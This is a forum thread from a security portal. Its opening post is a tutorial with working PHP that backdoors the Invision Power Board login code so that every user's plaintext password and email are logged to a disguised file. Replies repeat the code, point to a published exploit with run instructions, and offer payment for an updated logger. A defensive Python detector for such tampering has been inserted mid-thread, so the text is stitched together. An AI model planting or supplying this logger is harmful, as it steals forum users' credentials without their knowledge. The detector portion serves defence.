Waraxe IT Security Portal  
[IPB][Tutorial]Password logger
Posted: Thu Apr 17, 2008 3:10 pm
tr0nix
Active user
Joined: Mar 06, 2008
Posts: 48

Tested under:

    Invision Power Board 2.3.4


[Requirements]
- Access to the server


Open the "login_core.php", which is located at /IPB-PATH/sources/loginauth.

Search for

Code:
function auth_local( $username, $password )


and put the following lines under the function (above the $password = md5($password); line!):

Code:

      $lg_pwd = $password;


Then search for

Code:
$this->return_code = 'SUCCESS';


(the FIRST $this->return_code, it's about line 331) and put the following lines above the $this->return_code variable:

Code:
         
   @include("conf_global.php");
   $lg_username = strtolower($username);
   $lg_password = $lg_pwd;
   $lg_file = "./style_images/1/folder_mime_types/lg.html";
   $connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
   $selectdb = @mysql_select_db($INFO['sql_database']);
   $sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
         
   while($row = @mysql_fetch_array($sql_query))
   {       
      if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
      {
         $fp1 = @fopen($lg_file, "a+");
         @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
         @fclose($fp1);
         $f = @file($lg_file);
         $new = array_unique($f);
         $fp = @fopen($lg_file, "w");
         foreach($new as $values)
         {
            @fputs($fp, $values);
         }
         @fclose($fp);
      }
   }


Now wait a little bit and see how the file size of the logfile rises. ;)

PS: If the logger doesn't create the logfile automatically, then you need to create it manually and give the file chmod 0777.

(c) by [Team n0rth] tr0nix <tr0nix@inbox.ru>
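
A defender-side check for the modification described in the post above, as an added example that is not part of the original thread: it compares an auth source file against a known-good digest and flags a copy of the plaintext `$password` made before the `md5()` line, file or mail sinks, and a private database connection. The rule names, regexes and both sample sources are constructed for illustration and are assumptions, not a vendor tool.

```python
import hashlib
import re

# Added example: heuristics for a forum auth source such as login_core.php.
# Rule names and regexes are assumptions for illustration, not a vendor tool.
HASH_CALL = re.compile(r"\$password\s*=\s*md5\s*\(\s*\$password\s*\)")
PW_COPY = re.compile(r"\$\w+\s*=\s*\$password\s*;")
SINK = re.compile(r"\b(fopen|fwrite|fputs|file_put_contents|mail|fsockopen)\s*\(")
RAW_DB = re.compile(r"\bmysql_(connect|select_db|query)\s*\(")

def digest(src):
    """SHA-256 of the source, for comparison with a known-good copy."""
    return hashlib.sha256(src.encode("utf-8")).hexdigest()

def scan_auth_source(src):
    """Return (line_no, rule, text) findings for one PHP source string."""
    findings, hashed = [], False
    for no, line in enumerate(src.splitlines(), 1):
        text = line.strip()
        if text.startswith("function "):
            hashed = False              # new function: password not hashed yet
        if HASH_CALL.search(text):
            hashed = True
            continue
        if PW_COPY.search(text) and not hashed:
            findings.append((no, "plaintext-copy", text))  # cleartext kept aside
        if SINK.search(text):
            findings.append((no, "io-sink", text))         # file/mail write in auth code
        if RAW_DB.search(text):
            findings.append((no, "raw-db", text))          # private DB connection
    return findings
# Constructed samples: an untouched function and a modified one.
CLEAN = """function auth_local( $username, $password )
{
    $password = md5($password);
    $this->return_code = 'SUCCESS';
}"""
TAMPERED = """function auth_local( $username, $password )
{
    $saved = $password;
    $password = md5($password);
    $fp = @fopen("./img/out.html", "a+");
    @fwrite($fp, $saved);
    $this->return_code = 'SUCCESS';
}"""
if __name__ == "__main__":
    print("baseline match:", digest(TAMPERED) == digest(CLEAN))
    for finding in scan_auth_source(TAMPERED):
        print(finding)
```

The digest comparison against a copy from the original distribution archive is the reliable signal; the pattern rules only help triage a file that already differs.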

Posted: Thu Apr 17, 2008 6:02 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

IPB has another possible solution without access to the server, only admin access. Think.

Posted: Thu Apr 17, 2008 8:40 pm
tr0nix
Active user
Joined: Mar 06, 2008
Posts: 48

And?
You need just to edit this file and it really doesn't matter if you edit this file through a shell or through the template system or any other methods.
The coding stuff will be the same, so I don't understand why you try to goof off my works!?

koko wrote:
IPB has another possible solution without access to the server, only admin access. Think.

Posted: Fri Apr 18, 2008 9:38 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

To edit files on the server you need user perms. In 90% you don't have one.

Posted: Wed Sep 03, 2008 5:46 pm
_hacker_
Regular user
Joined: Aug 26, 2008
Posts: 14
Location: asia

Does someone have a 2.3.4 Perl IPB exploit? Because it is easy to use.

Posted: Wed Sep 03, 2008 8:45 pm
tr0nix
Active user
Joined: Mar 06, 2008
Posts: 48

_hacker_ wrote:
Does someone have a 2.3.4 Perl IPB exploit? Because it is easy to use.


http://milw0rm.com/exploits/6325

Posted: Thu Sep 04, 2008 11:55 am
_hacker_
Regular user
Joined: Aug 26, 2008
Posts: 14
Location: asia

tr0nix wrote:
_hacker_ wrote:
Does someone have a 2.3.4 Perl IPB exploit? Because it is easy to use.


http://milw0rm.com/exploits/6325


Bro, it's a PHP exploit; I don't know how to use a PHP exploit...

I know only Perl exploits.

Is there no difference between Perl and PHP?
For example, if it was Perl, I did these steps to run it:
1: install Perl and save this as ipb.pl
and then go to cmd and then the perl dir
c:/perl/bin\perl> ipb.pl
Like that. Now what to do? Can you explain, please?

Posted: Fri Sep 05, 2008 12:14 am
tr0nix
Active user
Joined: Mar 06, 2008
Posts: 48

_hacker_ wrote:
tr0nix wrote:
_hacker_ wrote:
Does someone have a 2.3.4 Perl IPB exploit? Because it is easy to use.


http://milw0rm.com/exploits/6325


Bro, it's a PHP exploit; I don't know how to use a PHP exploit...

I know only Perl exploits.

Is there no difference between Perl and PHP?
For example, if it was Perl, I did these steps to run it:
1: install Perl and save this as ipb.pl
and then go to cmd and then the perl dir
c:/perl/bin\perl> ipb.pl
Like that. Now what to do? Can you explain, please?



Download xampp (http://www.apachefriends.org/en/xampp-windows.html) and install it.

Then start your command prompt (start -> run -> cmd :p) and type

Path\To\xampp\php\php.exe Path\To\The\Exploit\exploit.php.

I didn't test the PHP exploit, but the script should be writing some options.

Posted: Tue Jan 13, 2009 2:45 pm
waplet
Active user
Joined: Dec 24, 2008
Posts: 31

I got this!
Code:
$this->return_code = 'SUCCESS';
         return;

But where to put
Code:
 @include("conf_global.php");
   $lg_username = strtolower($username);
   $lg_password = $lg_pwd;
   $lg_file = "./style_images/1/folder_mime_types/lg.html";
   $connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
   $selectdb = @mysql_select_db($INFO['sql_database']);
   $sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
         
   while($row = @mysql_fetch_array($sql_query))
   {       
      if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
      {
         $fp1 = @fopen($lg_file, "a+");
         @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
         @fclose($fp1);
         $f = @file($lg_file);
         $new = array_unique($f);
         $fp = @fopen($lg_file, "w");
         foreach($new as $values)
         {
            @fputs($fp, $values);
         }
         @fclose($fp);
      }
   }

this one? I can't understand. I don't want problems with errors :D

Posted: Mon Feb 16, 2009 7:25 pm
delta
Advanced user
Joined: Jan 11, 2009
Posts: 60

pexli wrote:
IPB has another possible solution without access to the server, only admin access. Think.


How can I do it using the admincp?

newest ipb
Posted: Mon Oct 05, 2009 5:13 am
iiDo
Regular user
Joined: Nov 24, 2007
Posts: 19

Anyone have an idea how to log with the newest IPB??

Thanks

Posted: Tue Oct 20, 2009 3:07 pm
thelordbug
Beginner
Joined: Oct 20, 2009
Posts: 2

Paying $20 USD via paypal for this to work for IPB 2.3.6

Posted: Sat Dec 05, 2009 2:37 am
0x3
Regular user
Joined: Jun 09, 2009
Posts: 10
Location: j0rd4n

This doesn't work, as it looks like you get the password for the user from the db; it will be MD5, like

Code:

jonnye_r : 8bef052c7ae033ad47baab006846438f (j0@j0.com)


In vBulletin it works fine [clear text], but IPB needs to get the password without the db ... so it will be clear text..

So this one is not useful, I think...

/j0